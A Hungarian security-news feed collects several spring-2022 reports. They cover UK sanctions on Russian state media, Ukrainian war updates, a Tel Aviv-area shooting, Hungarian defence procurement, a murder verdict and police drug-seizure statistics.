Biztonságpiac

Orosz állami médiatársaságok és vezetőik ellen léptetett érvénybe szankciókat csütörtökön a brit kormány, azzal az indokkal, hogy ezek a médiaszervezetek  Putyin elnök háborús propagandáját terjesztik.

Liz Truss brit külügyminiszter a szankciókat bejelentő közleményében propagandistáknak nevezte az intézkedésektől érintett orosz médiavezetőket és úgy fogalmazott, hogy Putyin hazugságok özönére alapozza ukrajnai háborúját. A minisztérium tájékoztatása szerint a szankciókkal sújtott médiaszemélyiségek között van Szergej Briljov, az állami Rosszija médiatársaság ismert televíziós műsorvezetője, aki a külügyi tárca szerint “Putyin propagandistája”.

Briljov, aki korábban Nagy-Britanniában élt, a csütörtökön bejelentett intézkedések alapján nem juthat hozzá Nagy-Britanniában lévő vagyoneszközeihez és nem folytathat üzleti tevékenységet az országban.

Hasonló szankciókat rótt ki a brit kormány Alekszandr Zsarovra, a Gazprom-Media vezérigazgatójára, aki korábban az orosz tömegtájékoztatási és távközlési felügyelet, a Roszkomnadzor vezetője volt, valamint Alekszej Nyikolovra, az állami RT televízió vezérigazgatójára és Anton Anyiszimovra, a Szputnyik médiatársaság több nyelven sugárzó nemzetközi rádióállomásának vezetőjére is.

A brit kormány közvetlen szankciókat léptetett érvénybe több orosz állami médiacég, köztük az RT-t tulajdonló TV Novosztyi, valamint a Szputnyik hírügynökségét irányító Rosszija Szevodnya állami médiacég ellen is.

A londoni külügyminisztérium csütörtöki nyilatkozata szerint ezek a szankciók biztosítják, hogy az RT televízió adása “ne kerülhessen vissza a brit képernyőkre”, és elejét veszik annak is, hogy a Nagy-Britanniában tevékenykedő vállalatok és magánszemélyek üzleti kapcsolatra léphessenek az orosz állami propagandát terjesztő RT-vel és Szputnyikkal, valamint e médiatársaságok vezető tisztségviselőivel.

A műsorszóró engedélyek kiadásáért is felelős brit távközlési felügyelet (Ofcom) a minap visszavonta az RT televízió nagy-britanniai műsorszolgáltatási jogosítványát, azzal az indokolással, hogy a hatóság nem tartja alkalmasnak az RT nagy-britanniai műsorszórási jogosultságának birtokosát, a TV Novosztyit e jog további gyakorlására.

Az Ofcom tájékoztatása szerint a döntés előzményeként 29 vizsgálat indult annak feltárására, hogy mennyiben tekinthető pártatlannak az RT hírszolgáltatása az Ukrajna elleni orosz invázióról. Az RT nagy-britanniai tevékenységi jogosultságát megvonó intézkedés indoklása szerint a brit demokratikus társadalomban komolyan kell venni azt a követelményt, hogy a műsorszórók nézőközönsége és hallgatósága illetéktelen beavatkozás nélkül juthasson hírszolgáltatáshoz.

Scholz írásbeli tájékoztatást kért Putyintól a gázszállítások elszámolásának változásáról
Írásbeli tájékoztatást kért Olaf Scholz német kancellár Putyintól az orosz földgázszállítások elszámolási rendszerének tervezett átalakításáról egy szerdai telefonos megbeszélésen, amelyet az orosz államfő kérésére tartottak – közölte szerda este a német kormány szóvivője. Steffen Hebestreit közleménye szerint Putyin elmondta, hogy aláír egy törvényt, amely szerint ugyan április 1-jétől a gázszállításokért rubelben kell fizetni, de ez nem jelent változást az európai szerződéses partnerek számára. Az orosz gáz árát továbbra is euróban kell kifizetni, és az összeget a szokásos módon a Gazprom Banknak kell átutalni, amelyet nem érintenek az Ukrajna ellen indított orosz háború miatt bevezetett büntetőintézkedések. A bank a beérkezett pénzt rubelre váltja át – fejtette ki Putyin. Scholz “a beszélgetés során nem egyezett bele ebbe az eljárásba”, csupán írásbeli tájékoztatást kért, hogy pontosabban megismerhesse. A német kormány továbbra is a legfejlettebb ipari államokat összefogó G7 csoportban kialakított álláspontot képviseli, miszerint “az energia-szállításokért kizárólag euróban vagy dollárban kell fizetni, ahogyan azt a szerződések előírják” – áll a közleményben.

The post Orosz állami médiatársaságok és vezetőik ellen léptetett érvénybe szankciókat a brit kormány appeared first on .

Az amerikai védelmi minisztérium (Pentagon) további állandó amerikai csapatokat küldhet Európába az Ukrajna elleni orosz támadás miatt – jelentette a The Washington Times.

A jobboldali-konzervatív napilap értesülései szerint Tod Daniel Wolters tábornok, az amerikai hadsereg európai főparancsnoka, aki egyben az Észak-atlanti Szerződés Szervezete (NATO) legfőbb európai katonai főparancsnoka (SACEUR) is, a héten arról tájékoztatta az amerikai kongresszus törvényhozóit: elképzelhető, hogy az Egyesült Államoknak ismét több katonát kell majd állomásoztatnia az európai támaszpontokon az orosz-ukrán háború befejezését követően is.

“Mindig vegyes, összetett elvárásokat támasztanak az állandó és az ideiglenesen állomásozó katonai erőkkel szemben. Mindkettő mellett szólnak érvek és ellenérvek” – mondta Wolters tábornok egy keddi meghallgatáson a szenátusi fegyveres erőkkel foglalkozó bizottságának ülésén. “Az a gyanúm, hogy továbbra is több (állandó) katonai erőre lesz szükségünk” – tette hozzá a főparancsnok.

Lloyd Austin amerikai védelmi miniszter nyitott az Európában létesített amerikai katonai támaszpontok állandó létszámának további növelésére vonatkozó javaslatra – erősítette meg John Kirby, a Pentagon szóvivője egy sajtótájékoztatón. “Biztosra vehetik, hogy a védelmi minisztérium felsővezetése mérlegeli európai katonai jelenlétünk megerősítését” – fejtette ki Kirby. “Az (európai) biztonsági környezet megváltozott. Akárhogy is végződik ez a háború – és még nem tudjuk, mikor és hogyan fog véget érni -, azzal a feltételezéssel élünk, hogy Európa sem lesz már ugyanaz, mint volt” – fogalmazott a szóvivő.

Az Egyesült Államok természetesen egyeztet európai szövetségeseivel, ha további állandó telepítésű katonai csapatokat kíván küldeni és állomásoztatni Európában, mondták el az amerikai védelmi minisztérium tisztségviselői. “Akármilyen döntést is hozunk, az mindenképpen a szövetségeseink és a partnereink egyetértésével történik” – tette hozzá a Pentagon szóvivője.

Orosz oligarchák nem javíttathatják repülőgépeiket és hajóikat Nagy-Britanniában
Orosz oligarchák ezentúl nem vehetik igénybe brit szakvállalatok szolgáltatásait repülőgépeik és hajóik karbantartására. A brit kormány szerda este beterjesztett, azonnal hatályba lépett sürgősségi törvénykezdeményezését azonnal alkalmazták is két orosz milliárdos, Jevgenyij Svidler és Oleg Tyinkov esetében – közölte a londoni külügyminisztérium. A kormány már a hónap első felében törvénytervezetet fogadtatott el, amelynek értelmében bűncselekménynek minősül orosz repülőgépek berepülése a brit légtérbe, illetve leszállásuk brit területen, orosz tulajdonú hajók pedig nem köthetnek ki Nagy-Britanniában. Az intézkedés szerdai kiterjesztésével lehetetlenné vált a szankciókkal sújtott orosz oligarchák tulajdonában lévő, Nagy-Britanniában tárolt repülőgépek karbantartása is, és ez az intézkedés immár az oligarchák jachtjaira is vonatkozik.

The post Orosz agresszió: a Pentagon további amerikai csapatokat küldhet Európába appeared first on .

A Debreceni Regionális Nyomozó Ügyészség kétrendbeli hivatali visszaélés bűntettével gyanúsított meg egy autópályarendőrt, míg két másik ember felbujtóként követte el ugyanezen bűncselekményt – közölte a Központi Nyomozó Főügyészség.

Azt írták, hogy a Borsod-Abaúj-Zemplén Megyei Rendőr-főkapitányságon dolgozó rendőr január 31-én helyszínelői szolgálatot látott el, amikor észlelte, hogy az M3-as autópálya egyik pihenőjében tartózkodó, fát szállító tehergépkocsi rakománya nincs szabályosan rögzítve. A rendőr a közlekedési szabályszegés miatt megkezdte az intézkedést és elkérte a jármű vezetőjének személyazonosító igazolványát. A sofőr éppen a fiával telefonált, aki felismerte az intézkedő rendőr hangját, ezért arra kérte az apját, hogy adja át neki a készüléket.

A rendőr – az ügyészség közlése szerint – ismerőse kérésére eltekintett a további intézkedéstől és – kötelességének megszegésével a jármű vezetőjének jogtalan előnyt biztosítva – az általa elkövetett szabálysértést nem szankcionálta. Közölték azt is, február 4-én ugyanez a rendőr egy rokona kérésére a járműnyilvántartásban utánanézett egy adott forgalmi rendszámhoz kapcsolódó adatoknak, amelyeket meg is osztott az érdeklődővel.

Mivel a rendőr szolgálati ok nélkül, a hivatali lehetőségeit kihasználva lekérdezést hajtott végre a nyilvántartásból, majd ezen adatokat kiadta jogosulatlan személynek, jogtalan előny biztosításával – hivatali hatáskörével visszaélve – újabb bűncselekményt követett el.

A nyomozó ügyészség a Nemzeti Védelmi Szolgálat feljelentése alapján indult ügyben kedden négy helyszínen hajtott végre összehangolt bűnügyi akciót. Az ügyészség a Borsod-Abaúj-Zemplén Megyei Rendőr-főkapitányság állományának segítségével kutatásokat és szemlét tartott, majd az elkövetők előállítását követően gyanúsítottként hallgatta ki a három férfit.

A gyanúsítottak szabadlábon védekeznek – áll a közleményben.

The post Az ügyészség hivatali visszaéléssel gyanúsít egy rendőrt és két másik embert appeared first on .

Fegyveres támadásokat követtek el kedd este Tel-Aviv egyik elővárosában, az első hírek szerint a merényleteknek több halálos áldozatuk van.

Izraeli lapjelentések jelentések szerint a támadás színhelye az ultraortodox zsidók lakta Bnei Brak városka volt. Elie Bin, a Magen David Adom – a helyi Vöröskereszt – igazgatója a Kan televíziós csatornának elmondta, hogy az elővárosban két különböző helyen követtek el támadást. “Öt sebesültünk van, négy áldozat a helyszínen, az ötödik pedig a kórházba szállítás után meghalt” – tudatta Bin.

A rendőrség megerősítette a támadás tényét, s egyúttal közölte, hogy agyonlőtték a támadót. De sem a nevét, sem tettének esetleges motívumait nem hozták nyilvánosságra. Egyelőre annyit tudni, hogy feltételezhetően egyedül követte el a támadásokat. Eli Levy, a rendőrség szóvivője újságíróknak azt mondta, hogy egyelőre vizsgálják, voltak-e cinkosai az elkövetőnek. Letartóztattak egy másik gyanúsítottat, de nem tudni, hogy volt-e köze a támadásokhoz.

A The Times of Israel című lap helyszíni tudósítója rendőri forrásokra hivatkozva arról írt, hogy terrorista támadásról van szó, elkövetője egy 25 éves, Dzsenin melletti településről származó palesztin fiatal férfi. Hírportálján a lap arról számolt be, hogy a Gázai övezetet uraló Hamász palesztin szervezet egyik vezetője, Musír al-Maszri a Hamász rádióadójának úgy nyilatkozott, hogy “a Tel-Aviv-i hadművelet kiemeli a palesztinok egységét, éljenek bárhol is”.

Izraelben egy héten belül ez volt a harmadik fegyveres támadás. Naftali Bennett izraeli miniszterelnök kedd este azonnal összehívta a biztonsági szolgálatok vezetőit a helyzet értékelésére.

The post Fegyveres támadásokat követtek el Tel-Aviv egyik elővárosában, több halott appeared first on .

Az ukrán vezérkar kedd délutáni helyzetjelentésében megerősítette, hogy az orosz erők egyes alakulataikat elkezdték visszavonni Kijev és az ország északkeleti részében lévő Csernyihiv megyékből Fehéroroszországba.

Az orosz fél az ukrán küldöttséggel kedden Isztambulban tartott tárgyalása után jelentette be, hogy a bizalom erősítése céljából jelentősen csökkenti a katonai tevékenységet Kijev és Csernyihiv térségében. Az ukrán vezérkar hozzátette viszont azt is, hogy az orosz erőket az ország keleti részében, Harkiv és Donyeck irányában tovább erősítik. Harkiv városát változatlanul blokád alatt tartják, az északkeleti országrészben fekvő Szumi környékéről pedig csapatokat vontak el, de Ukrajnán belül más területekre csoportosítják át azokat – írta jelentésében a vezérkar.

Az ukrán katonai vezetés arról is beszámolt, hogy Oroszország a csernobili atomerőmű körüli tiltott zónát szerinte lőszerszállításra és -felhalmozásra használja, valamint parancsnoki állomáshelyeket alakít ki az övezetben.

Szintén a vezérkar adott hírt arról, hogy ukrán katonák újabb magas rangú orosz katonai vezetővel végeztek: a Harkiv térségében folyó harcok közben megölték Gyenyisz Kurilo ezredest, a 200. gépesített lövészdandár parancsnokát.

Mikola Melnicsuk, a nyugat-ukrajnai Hmelnyickij megyeszékhelyű város polgármestere közben az Ukrajinszka Pravda hírportál szerint arról tájékoztatott, hogy az orosz erők rakétacsapást mértek a régióban, Sztarokosztjantyiniv településen lévő légi bázisra, megsemmisítve az ottani üzemanyag- és kenőanyag-készleteket. A polgármester információi szerint a támadás következtében személyi sérülés nem történt. A repülőtér ellen korábban már két támadás volt: a nyílt háború kezdetének másnapján öt rakétát lőttek ki rá az orosz erők, majd március 6-ra virradó éjjel újab rakétacsapást mértek rá, ez utóbbiban hárman sérültek meg – emlékeztetett a hírportál.

A dél-ukrajnai Herszon megyében újabb város polgármesterét rabolták el az orosz csapatok – közölte az ukrán főügyészség. Hola-Prisztany városvezetőjét az ukrán közlés szerint orosz katonák lőfegyverekkel fenyegetve ejtették fogságba. További részletek egyelőre nem ismertek.

Közben a mikolajivi megyei tanács épületének romjai alól már 12 holttestet emeltek ki, és a kimentett sérültek száma 33-ra nőtt – közölte kedd este a katasztrófavédelmi szolgálat. A dél-ukrajnai megyeszékhelyen a reggeli órákban csapódott be orosz lövedék a kilencemeletes hivatali épületbe, amely a robbanás következtében szinte teljesen összeomlott.

Szvjatoszlav Palamar, az Azovi-tenger partján fekvő Mariupolt védő Azov ezred parancsnok-helyettese keddi videóüzenetében válaszolt arra, miért nem hagyták el az alakulat tagjai Mariupolt, miután erre Volodimir Zelenszkij elnök engedélyt adott nekik. Kijelentette, hogy azért nem távoztak, mert nem hagyhatták hátra elesett és megsebesült társaikat. “Továbbra is megvédjük a várost, minden házat, utcát. Mindent megteszünk a sebesültek megmentése és halott katonáink eltemetése érdekében” – hangoztatta a parancsnokhelyettes. Szavaiból az derült ki, hogy már a városon belül folytatják a harcokat az orosz csapatokkal. Palamar “népirtásnak” nevezte a civil épületek ellen végrehajtott támadásokat és a városban okozott katasztrofális humanitárius helyzetet.

Luxemburg 2,5 milliárd euró értékben fagyasztott be orosz vagyont
A luxemburgi hatóságok 2,5 milliárd euró értékben fagyasztottak be orosz vagyontárgyakat az ukrajnai háború nyomán Moszkva ellen bevezetett uniós szankciók keretében – írta a The Luxemburg Times hírportál Juriko Backes pénzügyminiszter parlamenti bejelentésére hivatkozva. “Az összeg az Oroszország elleni uniós szankciók végrehajtásának eredménye” – idézte a pénzügyminisztert a hírportál. Juriko Backes azt is közölte, hogy Luxemburg eddig két légi járművet helyezett zárlat alá, további kettőt kitiltanának az EU légteréből. A lefoglalt repülőgépek egy olyan céghez tartoznak, amely beágyazódott a szankciókkal sújtott oligarcha, Roman Abramovics üzleti hálózatába.

The post Orosz agresszió: az ukrán vezérkar megerősítette egyes orosz alakulatok kivonását Kijev és Csernyihiv térségéből appeared first on .

Átadták Magyarország harmadik honvédelmi sportközpontját kedden Balassagyarmaton. Az ünnepségen Benkő Tibor honvédelmi miniszter kiemelte, az ország védelmi képességeihez kell egy erős magyar honvédség, kell egy jó szövetség, és éppúgy kell a társadalom elhivatottsága és elkötelezettsége.

A miniszter a sportközpontok legfontosabb céljának nevezte, hogy színteret adjanak a hazafias honvédelmi nevelésnek.

Kifejtette: lehet venni modern technikai eszközöket, ki lehet képezni, fel lehet készíteni a katonákat ezek kezelésére, de érzelmileg is kötődni kell a hazához, hogy ezeket az eszközöket ne csak szakszerűen tudják kezelni katonáink, hogy a haza iránt elkötelezett, lojális, áldozatkész emberek szolgálják a nemzetet.

Benkő elmondta, a tervek szerint valamennyi járásban lesznek honvédelmi sportközpontok, amelyeknek a közösségépítés mellett feladatuk a fiatalok egészséges életmódra nevelése, és a sport által a bajtársias versenyszellem kialakítása is. A miniszter beszámolt arról, hogy országosan 102 intézményben folytatnak hazafias honvédelmi nevelést, Nógrád megyében négy ilyen középiskola van, és a jövő héten az ötödik iskolával írják alá a megállapodást.

Balassagyarmaton az Ipolypart úton épült, a fiatalok hazafias és honvédelmi nevelését szolgáló, mintegy ezer négyzetméteres létesítményben több mint tíz sportágat lehet kipróbálni és gyakorolni. A Nógrád megyei városban 2020. február 28-án rakták le a sportközpont alapkövét.

Juhász Roland állami vagyongazdálkodásért felelős államtitkár elmondta, első ütemben 16 helyszínen épülnek professzionális, multifunkcionális sportközpontok, A bajai és az újfehértói után adták át a balassagyarmati létesítményt, amely 875 millió forintból valósult meg, az üzemeltetéséhez szükséges eszközök beszerzéséhez 62 millió forintot biztosított a kormány.

A zöldmezős beruházásként épült központ a többi között rendelkezik közösségi teremmel, sportlövészetet kiszolgáló helyiségekkel, fedett és nyitott lőtérrel is, minden adott ahhoz, hogy az itt élő fiatalok és idősebbek is lehetőséget kapjanak az egészséges életre, a sportra, és a hazafias gondolkodás elsajátítására – mondta az államtitkár.

Simicskó István, a Honvédelmi Sportszövetség elnöke hangsúlyozta: Magyarország új védelmi kultúrát épít, ennek része a sportközpontok megépítése is, ezek lehetőséget adnak a fiataloknak arra, hogy fizikai és szellemi, lelki értelemben is megéljék, mit jelent a haza védelme. Itt közösségben fejleszthetik önismereti képességeiket, és mindez felkeltheti érdeklődésüket a katonai pálya iránt is – mondta Simicskó István.

Az átadási ünnepségen kisfilmet vetítettek le a Honvédelmi Sportszövetségről, annak rendezvényeiről, a szalagátvágást és a bejárást követően pedig lövészetből és küzdősportból tartottak bemutatót az új központban.

The post Átadták a honvédelmi sportközpontot Balassagyarmaton appeared first on .

Az ukrán vezérkar szerint megtévesztő a bejelentés az orosz csapatkivonásokról Kijev és Csernyihiv környékéről, valójában Moszkva nem mondott le az ukrán főváros körbezárásának tervéről – idézte szerdán az Ukrajinszka Pravda hírportál a katonai vezetés közleményét.

A vezérkar közölte: bizonyos jelek arra utalnak, hogy az oroszok egységeket csoportosítanak át annak érdekében, hogy a fő erőket keleti irányba összpontosíthassák. “Az úgynevezett csapatkivonás valószínűleg az egyes egységek rotációja, és célja az ukrán fegyveres erők katonai vezetésének félrevezetése, valamint olyan illúzió keltése, miszerint a megszállók nem akarják körbezárni Kijevet” – állította a vezérkar.

Az ukrán és az orosz tárgyalóküldöttség keddi isztambuli tárgyalása után jelentette be Moszkva, hogy a bizalom erősítése céljából jelentősen csökkenti a katonai tevékenységet Kijev és Csernyihiv térségében. A vezérkar szerdán, déltájban közzétett helyzetjelentésében arról számolt be, hogy a csernobili atomerőműnél folytatódik az orosz csapatok létszámának növelése. Vegyes haditechnikai eszközökből álló hadoszlop mozgását rögzítették a Kijevtől északnyugatra fekvő Ivankiv település felől a csernobili atomerőmű irányába.

Ugyancsak az ukrán vezérkar jelentette, hogy az Ukrajnában harcoló orosz csapatokhoz mintegy kétezer katona érkezett erősítésként Georgia orosz ellenőrzés alatt lévő területeiről, azaz Abháziából és Dél-Oszétiából. Közben 15-re emelkedett a déli országrészben a mikolajivi megyei kormányzói hivatal épületét kedden ért támadás következtében elhunytak száma. A kilencemeletes épületbe orosz lövedék csapódott be, és szinte teljesen romba döntötte a hivatalt. Az ukrán katasztrófavédelem még folytatja a mentési munkálatokat.

Az észak-ukrajnai Csernyihiv térségében Nyizsin települést támadták az orosz erők még kedden, a helyi polgármester szerdán a Facebookon arról számolt be, hogy egy polgári személy életét vesztette, hat – köztük egy gyermek – megsérült. Tíz lakóházban keletkeztek károk.

A Donyeck megyei Liszicsanszk város elleni szerdai orosz nehéztüzérségi támadás következtében négytagú család sérült meg repeszektől, a két gyermek súlyos állapotban van – hozta nyilvánosságra Szerhij Hajdaj, a megye katonai adminisztrációjának vezetője. A Telegram üzenetküldő portálon nem sokkal később Hajdaj arról adott hírt, hogy egy, Liszicsanszkból indult evakuációs buszt tűz alá vettek az orosz erők. Hozzátette, hogy senki nem sérült meg, s az elmúlt napon 260 lakost menekítettek ki a városból.

Az Ukrajinszka Pravda helyi hírportálra hivatkozva arról számolt be, hogy az orosz csapatok által elfoglalt dél-ukrajnai Herszonban elrabolták az ukrán ortodox egyház egyik papját, Szerhij Csudinovicsot. Szemtanúk szerint a papot a templomból hurcolták el ismeretlenek, akik “rendőröknek” adták ki magukat. A templomot átkutatták, a bent lévő híveket igazoltatni próbálták, azonban az emberek nem adták át nekik irataikat. A pap Herszonban ismert civil aktivista és önkéntes is egyben – írta a hírportál.

Az ukrán vezérkar legfrissebb, szerdai összesítése szerint eddig hozzávetőlegesen 17 300 orosz katona esett el, mintegy ezer került fogságba. A vezérkar állítása szerint az ukrán erők megsemmisítettek 131 orosz repülőgépet, ugyanennyi helikoptert, hét hadihajót, 605 harckocsit, 1723 páncélozott harcjárművet, 305 tüzérségi és 54 légvédelmi rendszert, valamint 96 rakéta-sorozatvetőt.

Orosz szuperjachtot foglalt le a brit kormány
Lefoglalt kedden a brit kormány egy 38 millió font (17 milliárd forint) értékű luxusjachtot, amely egy meg nem nevezett orosz oligarcha tulajdona. Grant Shapps brit közlekedési miniszter a londoni alsóháznak küldött átiratában közölte, hogy a csaknem 60 méter hosszúságú hajó tulajdonosának kilétét “szándékosan és alaposan eltitkolták” a jachtot hivatalosan bejegyző cég képviselői. A Phi nevű hajót a karib-tengeri Szt. Kitts és Nevis szigetállamban jegyezték be, de máltai lobogó alatt közlekedett.

A Decathlon felfüggeszti, az Auchan és a Leroy Merlin folytatja tevékenységét Oroszországban
A Decathlon kedden közleményben bejelentette, hogy ellátási problémák miatt felfüggeszti a tevékenységét Oroszországban. A francia sportszerforgalmazó vállalatra az ukrajnai háború kezdete óta nyomás nehezedik annak érdekében, hogy vonuljon ki az országból. “A nemzetközi szankciók szigorú tiszteletben tartásával a Decathlon megállapítja, hogy az ellátási feltételek többé nem adottak ahhoz, hogy folytassuk a tevékenységünket Oroszországban. A Decathlon ezért felfüggeszti az üzletei működtetését” – olvasható a Mulliez-család tulajdonában lévő nagyvállalat közleményében. A család három vállalattal van jelen Oroszországban: a Decathon mellett az Auchan áruházlánccal és a Leroy Merlin barkácsbolt-hálózattal. A két utóbbi folytatja tevékenységét Oroszországban.

Nemfáj: a J&J nem szállít testápolási termékeket Oroszországba
Az amerikai Johnson & Johnson, a világ legnagyobb egészségügyi termékgyártója pedig úgy döntött, hogy felfüggeszti a testápolási termékek Oroszországba történő szállítását. Március elején a J&J már arról határozott, hogy leállítja a befektetéseket, a reklámozást és a klinikai vizsgálatokat Oroszországban. Most, “a humanitárius válság fokozódása miatt” a cég további intézkedéseket tesz. Ennek részeként 5 millió dollárról 10 millió dollárra emeli a humanitárius célokra szánt adományokat a menekültek megsegítésére. A Johnson & Johnson bevételének mindössz egy százaléka származik Oroszországból.

The post Orosz agresszió: az ukrán vezérkar szerint az orosz erők nem tettek le Kijev körbezárásának tervéről appeared first on .

Hadilőszerek széles választékát szerzi be a Magyar Honvédség a Rheinmetall cégcsoporttól – jelentette be Maróth Gáspár védelmi fejlesztésekért felelős kormánybiztos.

A kormánybiztos közleménye szerint a szerződés teljesítése 2023-ban kezdődik, 2031-ig tart, és kulcszerepet játszik benne a német hadiipari vállalat többségi tulajdonában lévő, Várpalotán létesülő lőszergyár.

Az együttműködés részeként közepes kaliberű, harminc milliméteres lőszerek választéka érkezik a Rheinmetall zalaegerszegi üzemében 2023-tól előállítandó Lynx gyalogsági harcjárművek számára, 120 milliméteres lőszerek a Leopard 2 harckocsikhoz, valamint 155 milliméteres tüzérségi lövedékek, hajítótöltetek és gyújtók a PzH 2000 önjáró lövegekbe. A megrendelés részét képezik a 40 milliméteres Rosy és a 76 milliméteres Maske ködgránátvetők töltetei, valamint 12,7 és 7,62 milliméteres, kis kaliberű lőszerek is – ismertették.

A közlemény szerint Maróth a szerződés aláírásakor azt mondta: “a beszerzési program lehetővé teszi, hogy a honvédség és a kibontakozó hazai védelmi ipar együttes erővel, hitelesen szavatolhassa Magyarország és a magyar emberek biztonságát és békéjét. Hosszú távon biztosítja a rendszeresítésre kerülő korszerű harcjárművek fegyverzetének ellátását”. Szem előtt tartja továbbá a védelmi iparfejlesztés, a hazai hadianyaggyártás újjáélesztésének szempontjait is – jegyezte meg.

Rövidesen a Rheinmetallal közösen létrehozandó várpalotai lőszergyár is bekapcsolódik a megrendelés teljesítésébe, a termékek túlnyomó részét ott gyártják majd – mondta a kormánybiztos, aki egyúttal kiemelte: “a megfelelő lőszerkészlet és honi lőszergyártó képesség az erős honvédelem alappillére”.

Armin Papperger, a Rheinmetall cégcsoport vezérigazgatója a beszerzést kommentálva nagy megtiszteltetésnek nevezte, hogy Magyarország ismételten cégcsoportjukat bízta meg haderőfejlesztése egy újabb fontos részletével. “Örömünkre szolgál, hogy egy újabb területen működhetünk együtt magyar barátainkkal” – fogalmazott a közlemény szerint a német hadiipari vállalat vezérigazgatója.

The post Maróth: lőszereket vesz a Rheinmetall cégcsoporttól a honvédség appeared first on .

Huszonnégy év fegyházbüntetésre ítélte a Debreceni Törvényszék azt a férfit, aki a közösségi oldalán megüzente a sértettnek, hogy megöli őt, majd nem sokkal később egy Polgáron megtartott rendezvényen be is váltotta a fenyegetését – közölte a bíróság szóvivője.

Dobó Dénes jelezte: a törvényszék O. Sz.-t – egyebek mellett – emberölés és kerítés bűntettében találta bűnösnek. Az ítélet szerint a vádlott nem bocsátható feltételes szabadságra.

A tényállás szerint a polgári férfi és élettársa – anyagi gondok miatt – 2017 szeptemberében úgy döntött, hogy a nő szexuális szolgáltatást fog nyújtani férfiaknak. A partnereket a nő egy közösségi oldalon hirdetésekkel kereste, illetve a vádlott szerezte. Többször a férfi mondta meg a nőnek, hogy kihez, hova kell mennie, de volt olyan is, hogy személyesen vitte el. A kapott pénz egy részét a nőnek át kellett adnia a vádlottnak – ha ezt megtagadta, a férfi megverte őt.

O. Sz. egy gyerekkori ismerősének is ajánlotta a nőt 2019 márciusában. Kétszer össze is hozta a találkozót, amelyen a nő és kuncsaftja között szimpátia alakult ki. A férfi megsajnálta a nőt, majd – kihasználva, hogy a vádlott 2019 májusában Budapestre ment dolgozni – a gyermekével együtt magához költöztette. O. Sz. emiatt mindkettőjüket megfenyegette, és azt hangoztatta, hogy a férfit megöli; a közösségi oldalára is kiírta: “augusztus 18-án meghalsz”.

Polgár főterén augusztus 19-én este rendezték meg az újkenyér ünnepét, amelyen ott volt mindkét megfenyegetett; a férfi annak ellenére, hogy a fia figyelmeztette a vádlott fenyegető üzenetei miatt. A vádlott is a rendezvényre tartott, amit élő videón közvetített a közösségi oldalán, végig azt hangoztatva, hogy meg fogja ölni a férfit.

A rendezvény helyszínén O. Sz. észrevétlenül, hátulról megközelítette haragosát, hirtelen a hátára ugrott, és emiatt mindketten a földre estek. Dulakodás közben O. Sz. a sértettet késsel megszúrta a hátán, derék- és nyaktájékon. A további bántalmazást a rendezvényt biztosító rendőrök akadályozták meg, akik a vádlottat a helyszínen elfogták. O. Sz. véréből és vizeletéből a szakértő új pszichoaktív anyagot és más kábítószert is kimutatott.

A sértett kórházba szállítás közben meghalt. A törvényszék ítélete ellen az ügyészség súlyosításért, a vádlott és védője enyhítésért fellebbezett – közölte a szóvivő.

The post Huszonnégy év fegyházat kapott az a polgári férfi, aki koncerten ölte meg haragosát appeared first on .

Jelentősen nőtt a magyarországi kábítószer-kínálat, de a rendőrség sikeresen vette fel a kábítószer-kereskedelem elleni harcot és drogfogási rekordok dőltek meg – közölték az Országos Rendőr-főkapitányság (ORFK).

Csákó Ibolya, az ORFK bűnügyi főosztályának kiemelt főreferense úgy összegezte: XXI. századi módszerek jelentek meg a bűnözésben, de a bűnüldözésben is. Példaként említette, hogy a koronavírus rászoktatta az embereket az online vásárlásra, de az online kereskedelem az illegális térben is virágzik. Ezért a rendőrség is nagy hangsúlyt fektet a kábítószerek, az új pszichoaktív anyagok és a hamis gyógyszerek online kereskedelmének felderítésére.

Az alezredes kiemelte: tavaly az év első két hónapjában a lefoglalt kábítószerek nyolc százaléka származott a nemzetközi postaforgalomból, idén már húsz százalék ez az arány. Kitért az úgynevezett ANOM-ügyre is; ez egy titkosított, az FBI által tervezett platformot takar, amelyről azt terjesztették, hogy a rendőrök biztosan nem férnek hozzá. Valójában azonban az FBI és az Europol együttműködésében egy magyar bűnszervezetet is sikerült leleplezniük.

Csákó felidézte: tavaly nyáron 11 embert fogtak el, majd a júniusi elfogások után júliusban is elfogtak három embert, akiktől ötven kilogramm marihuánát, négy kilogramm kokaint és negyven liter amfetaminolajat foglaltak le. Az ügyhöz kapcsolódóan idén februárban is elfogtak két embert, akiktől 36 millió forintot, nagy értékű órákat, ékszereket, valamint háromezer ecstasy tablettát foglaltak le.

Szintén az ügyhöz kapcsolódóan fogtak el egy férfit, aki az internetről rendelt hétezer ecstasy tablettát és négy kilogramm amfetamint. Akkor mentek érte a rendőrök, amikor épp újabb 15 ezer tablettát rendelt az internetről – folytatta az alezredes, aki hihetetlennek nevezte ezt a kábítószer-mennyiséget és úgy fogalmazott: ők is megdöbbentek, hogy milyen nagy mennyiségű kábítószer van Magyarországon. A lefoglalással százmillió forint értékű drog utcára kerülését akadályozta meg a rendőrség – tette hozzá.

Egy másik ügyről szólva azt mondta: egy Bács-Kiskun megyei településen egy kétszintes, 180 négyzetméteres könnyűszerkezetes csarnoképületben egy olyan fejlett infrastruktúrát találtak, amely termesztőtálcákban 1300 kannabisz termesztésére volt alkalmas egyidejűleg. A csarnok távvezérelhető infralámpával, hőmérséklet- és páramérő eszközökkel volt felszerelve, amelyek egy internetes felhőbe konfigurált fiókba közvetítették az adatokat, vagyis a termesztők a távolból is látták azokat. Ezeket az eszközöket külföldről vásárolták – mondta az alezredes, hozzátéve: nem csak kannabiszt, hanem hat kilogramm kokaint is lefoglaltak a helyszínen. Ebben az ügyben két bűnszervezet ellen folyik eljárás és öt ember ellen adtak ki körözést.

Csákó arról is beszélt, hogy több esetben “családi biznisz” a kábítószer-kereskedelem. Példaként említette azt az apát és fiát, akik azzal váltak gyanússá egy borsodi településen, hogy hirtelen meggazdagodtak. A rendőrségnek a terjesztőjüket is sikerült elfognia, az ügyben pedig több mint 100 kilogramm új pszichoaktív anyag utcára kerülését akadályozták meg. A félmillió adagnak megfelelő kábítószer mennyiségének érzékeltetésére az alezredes azt mondta: az elmúlt öt évben nem foglaltak le ennyi új pszichoaktív anyagot összesen.

Egy másik ügyben Nógrád megyében egy 52 éves apa és 19 éves fia bukott le, tőlük 44 kilogramm kannabiszt, nyolc kilogramm kokaint és 2,8 kilogramm ketamint foglaltak le. Utóbbi azért érdekes, mert Magyarországon nem jellemző ez a fajta drog, és Magyarországon ilyen nagy mennyiséget egy eljárásban még sosem foglaltak le a rendőrök – mondta. A kokain mennyiségét érzékeltetve közölte: tavaly 13 kilogramm kokaint foglaltak le az év során.

